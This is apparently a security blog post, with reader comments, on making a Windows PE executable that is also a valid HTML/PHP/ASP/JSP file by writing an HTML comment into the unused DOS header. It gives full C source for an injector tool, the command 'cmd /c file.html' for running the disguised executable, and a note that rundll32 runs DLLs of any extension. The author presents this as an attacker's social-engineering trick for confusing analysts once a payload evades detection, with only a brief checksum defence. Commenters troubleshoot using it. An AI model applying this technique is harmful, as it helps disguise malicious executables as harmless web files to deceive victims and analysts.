In my previous article Exploring the MS-DOS Stub I stated that after experimenting, the Windows loader only cares about the e_magic and the e_lfanew members from the _IMAGE_DOS_HEADER. Because the rest of the members of the DOS header is used by MS-DOS to execute the stub program. Check it out if you have not.
If you take a PE file and null out the MS-DOS header and the MS-DOS stub program leaving out the e_magic and the e_lfanew values, the PE will still work fine as the rest is not needed by the Windows PE loader. The e_lfanew address at offset 0x3c is important as it points to the beginning of the _IMAGE_NT_HEADERS structure which is the actual start of the PE file.
Since those values are not important we can insert an HTML comment from offset 0x2 which is the e_cblp value and begin an HTML comment and end the comment at the end of the PE and append our HTML/PHP/ASP/JSP file contents.
I wrote a simple program in C to automate this task. You can provide your PE file and the HTML/PHP/ASP/JSP file to inject and it will generate an HTML file. You can rename the file into the extension you desire.
https://github.com/OsandaMalith/PE2HTML
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 |
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> #ifdef _WIN32 #include <io.h> #endif #define MAX 500 #define e_cblp 0x2 #define STUB 0x40 /* Author: Osanda Malith Jayathissa (@OsandaMalith) Write-up: https://osandamalith.com/2020/07/19/hacking-the-world-with-html/ Disclaimer: Author takes no responsibility for any damage you cause. Use this for educational purposes only. Copyright (c) 2020 Osanda Malith Jayathissa https://creativecommons.org/licenses/by-sa/3.0/ */ void inject(char *, char *); void dump(void *, int); void banner() { fflush(stdin); const static char *banner = "\t _-_.\n" "\t _-',^. `-_.\n" "\t ._-' ,' `. `-_ \n" "\t!`-_._________`-':::\n" "\t! /\\ /\\::::\n" "\t; / \\ /..\\::: PE 2 HTML Injector\n" "\t! / \\ /....\\:: Coded by Osanda Malith Jayathissa (@OsandaMalith)\n" "\t!/ \\ /......\\: https://osandamalith.com\n" "\t;--.___. \\/_.__.--;; \n" "\t '-_ `:!;;;;;;;'\n" "\t `-_, :!;;;''\n" "\t `-!' \n"; for (banner; *banner; ++banner) fprintf(stdout, "%c", *banner); } int main(int argc, char *argv[]) { size_t i; char *fileName, *payload; banner(); if (argc != 5) { printf("\n[-] Usage: %s -i <PE> -p <HTML/PHP/ASP File> \n", argv[0]); puts("[*] The output will be in .html, You may rename it to the format you desire."); return 1; } for (i = 1; i < argc; i++) { if (!strcmp(argv[i], "-i")) fileName = argv[i + 1]; if (!strcmp(argv[i], "-p")) payload = argv[i + 1]; } inject(payload, fileName); return 0; } void inject(char *payload, char *fname) { int src, dst, sz; char myCurrentChar, newFilename[MAX], check[1], *hex = (char *)calloc(0x80, sizeof(char)), *comment = "\x3c\x21\x2d\x2d", *comment_end = "\x2d\x2d\x3e"; strncpy(newFilename, fname, MAX); newFilename[strlen(fname) - 3] = '\0'; strcat(newFilename, "html"); #ifdef _WIN32 src = _open(fname, O_RDONLY | O_BINARY, 0); dst = _open(newFilename, O_CREAT | O_TRUNC | O_WRONLY | O_BINARY, S_IREAD | S_IWRITE); #elif __unix__ src = open(fname, O_RDONLY, 0); dst = open(newFilename, O_CREAT | O_TRUNC | O_WRONLY, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); #endif check[sz = read(src, check, 2)] = '\0'; if (strcmp(check, "MZ")) { fprintf(stderr, "[!] Enter a valid PE file"); close(src); exit(-1); } lseek(src, 0, SEEK_SET); while (read(src, &myCurrentChar, 1)) write(dst, &myCurrentChar, 1); lseek(dst, e_cblp, SEEK_SET); printf("[*] Commenting the MS-DOS e_cblp at offset 0x%x\n\n", e_cblp); write(dst, comment, strlen(comment)); close(src); close(dst); #ifdef _WIN32 dst = _open(newFilename, O_RDONLY | O_BINARY, 0); #elif __unix__ dst = open(newFilename, O_RDONLY, 0); #endif hex[sz = read(dst, hex, 0x80)] = '\0'; dump(hex, sz); free(hex); close(dst); #ifdef _WIN32 src = _open(payload, O_RDONLY | O_BINARY, 0); dst = _open(newFilename, O_WRONLY | O_APPEND | O_BINARY, 0); #elif __unix__ src = open(payload, O_RDONLY, 0); dst = open(newFilename, O_WRONLY | O_APPEND, 0); #endif puts("\n[*] Appending the Payload"); write(dst, comment_end, strlen(comment_end)); while (read(src, &myCurrentChar, 1)) write(dst, &myCurrentChar, 1); close(src); close(dst); printf("[+] Successfully written to %s\n", newFilename); } void dump(void *addr, int len) { size_t i; unsigned char buff[0x80]; unsigned char *pc = (unsigned char*)addr; for (i = 0; i < len; i++) { if (!(i % 16)) { if (i) printf(" %s\n", buff); printf(" 0x%04X: ", i); } printf(" %02X", pc[i]); buff[i % 16] = (pc[i] < 0x20) || (pc[i] > 0x7e) ? '.' : pc[i]; buff[(i % 16) + 1] = '\0'; } while ((i % 16)) { printf(" "); i++; } printf(" %s\n", buff); } /*EOF*/ |
Another thing to note is that in Windows, cmd.exe and rundll32 will treat any file with any extension as a valid PE as long as it begins with the IMAGE_DOS_SIGNATURE.
By abusing these Windows features (bugs) we can execute our HTML files as executables as well as run in the web browser displaying HTML/PHP/ASP/JSP content.
You can run the newly created PE file with HTML extension or with any extension using cmd.
cmd /c file.html
Process explorer output would look like this.
Rundll32 does not validate any extensions, therefore you can execute any DLL with any extension.
By combining these features (bugs) an attacker can achieve social engineering. This won’t bypass any AV or any EDR. But will surely confuse the analyzer. Might be a handy trick to use at the last stage once your payload is undetectable.
A checksum check can be used to prevent attackers from modifying the MS-DOS header. But a skilled reverse engineer may find the checksum routine and patch it to bypass the anti-reversing technique.
The author takes no responsibility for any damage you cause. This is strictly written for educational purposes.
So how do you get the malicious HTML file to execute? Wouldn’t the user have to open the executable in a web browser for that to happen?
I have mentioned on how to execute the file. It will work on both the web browser and in CMD. You can also use a PE loader to execute.
It doesn’t work on the browser, but it works fine on the cmd,Can you make a video of how to use it ):
I manually nulled and added wanted html. it works fine in the browser but when I exec with cmd it gives me this error, “cannot run or start due to incompatibility with 64-bit windows” also that binary I have edited was 64bit compiled. any ideas?
Did you try using the code I have posted?
Yes but it takes some time to complete, anyhow I was able successfully add my HTML code to putty PE manually with the second try :D. Great tutorial !
Great!
Hello, i try this soft, but when html file not appending with payload, how solve this problem?
Did you try manually?
no via script, adding does not start after transferring the load to html, compiled with gcc, I would be grateful if you could throw off an example of the apended html or suggest how to fix the problem.